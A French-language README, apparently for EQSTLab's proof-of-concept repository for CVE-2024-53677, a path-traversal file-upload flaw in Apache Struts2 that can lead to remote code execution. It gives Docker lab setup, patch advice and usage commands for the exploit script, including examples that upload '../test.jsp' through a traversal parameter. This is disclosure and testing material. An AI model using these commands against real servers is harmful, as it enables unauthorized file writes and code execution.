
Défaut de logique de téléchargement de fichiers dans l'exploit Apache Struts2
Cet article de recherche est publié par EQSTLab.
★ CVE-2024-53677 Téléchargement sans restriction de fichier de type dangereux et PoC RCE ★
cd docker
docker build --ulimit nofile=122880:122880 -m 3G -t cve-2024-53677 .
docker run -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2024-53677 cve-2024-53677
Déc. 11 : PoC de téléchargement de fichier CVE-2024-53677 publié
CVE-2024-53677 : La logique de téléchargement de fichiers dans Apache Struts est défectueuse. Un attaquant peut manipuler les paramètres de téléchargement de fichiers pour permettre des traversées de chemin et, dans certaines circonstances, cela peut conduire au téléchargement d'un fichier malveillant pouvant être utilisé pour exécuter du code à distance. Ce problème affecte Apache Struts : de 2.0.0 avant 6.4.0. Il est recommandé aux utilisateurs de mettre à niveau vers la version 6.4.0 au minimum et de migrer vers le nouveau mécanisme de téléchargement de fichiers https://struts.apache.org/core-developers/file-upload . Si vous n'utilisez pas une ancienne logique de téléchargement de fichiers basée sur FileuploadInterceptor, votre application est sûre. Vous trouverez plus de détails dans https://cwiki.apache.org/confluence/display/WW/S2-067.
git clone https://github.com/EQSTLab/CVE-2024-53677.git
cd CVE-2024-53677
pip install -r requirements.txt
# Télécharger le fichier par défaut
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName>
# Télécharger un fichier spécifié
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName> -f <Chemin du fichier>
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp -f ./test.txt
CVE-2024-53677.py
Ce référentiel n'est pas destiné à être un exploit d'injection d'objets pour CVE-2024-53677. Le but de ce projet est d'aider les personnes à en apprendre davantage sur cette vulnérabilité et, peut-être, à tester leurs propres applications.
Nous publions des analyses de CVE et de logiciels malveillants une fois par mois. Si cela vous intéresse, veuillez suivre les liens ci-dessous pour consulter nos publications. https://www.skshieldus.com/eng/business/insight.do
https://nvd.nist.gov/vuln/detail/CVE-2024-53677
https://attackerkb.com/topics/YfjepZ70DS/cve-2024-53677
https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker